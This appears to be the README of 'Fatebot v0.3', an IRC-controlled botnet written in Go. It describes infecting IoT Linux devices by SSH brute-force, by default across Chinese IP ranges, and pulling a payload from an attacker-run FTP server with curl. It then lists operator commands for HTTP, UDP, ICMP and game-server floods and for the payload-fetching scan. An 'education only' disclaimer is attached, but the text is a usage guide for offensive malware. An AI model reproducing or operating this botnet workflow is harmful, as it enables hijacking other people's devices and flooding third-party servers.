Attention Attention!!! My english is terrible. I'm so sorry about that :(
Fatebot v0.3
This is my first IRC bot for launch ddos attack, Mainly of scan target are IoT device that run linux and open default SSH port, This bot is write on Go language. For education purpose only. Please test it in your lab. And i create this for join university in the future not for attack anyone server with out any permission!!!
IRC commands are in the bottom of The page.
Infect
The infect function of this botnet is scanning by SSH port(default as 22) and login by Brute-force attack. (Default is scan on range of CHN network. You can add more or change it, if you want.) This botnet use "curl" to get payload from FTP server, so... please prepair your FTP server first, It very important for infect process.
I scan on my private netowrk in SSH range, And comment a function of running session.(That why bot is not join The server.)
DDoS
Raw socket programming is really hard for me. That's why all of The volumetric are a simple like udp and icmp flood. Main DDoS function is on The Application layer.
Build payload
Update Lists
Fatebot v0.1 = Fatebot open release.
Fatebot v0.2 = Update get bot system information function and Add tutorial in main and scan file.
Fatebot v0.2.1 = Cut private scanning and OS signal by change it to delete when running. And change some IRC commands that will type easier.
Fatebot v0.2.2 = Cut scan failed report for fix server overheat and excess flood, And Optimize by change ip range and default ping time, That will help to find SSH port faster.(Maybe, But faster than old one.)
Fatebot v0.3 = Update new DDoS Vector. Set size of UDP packet to 700 as default when bot herder not input The size.
IRC Commands
- ?get [url]
- ?get http://target.com - Flood HTTP get request to target.
- ?post [url]
- ?post http://target.com - Flood HTTP post request to target.
- ?udp [ip] [size]
- ?udp 192.168.1.16 500 - Flood UDP packets by random src and dst port to target.
- Min and Max of Buffer is 1 - 700bytes.
- ?icmp [ip]
- ?icmp 192.168.1.16 - Flood ICMP with large packets to target.
- ?vse [ip] [size]
- ?vse 192.168.1.16 500 - Flood UDP packets by random src port with valve source engine dst port. To the target server that used to host online games.
- Min and Max of Buffer is 1 - 700bytes.
- ?scan [ftp server]
- ?scan ftp://192.186.1.16/payload - Scan CHN ip range on SSH port and get payload with curl.
- ?info
-
- Get bot system information.
- ?kill
-
- Kick bot out of The server.
- ?stopddos
-
- Stop ddos attacking.
- ?stopscan
-
- Stop scanning.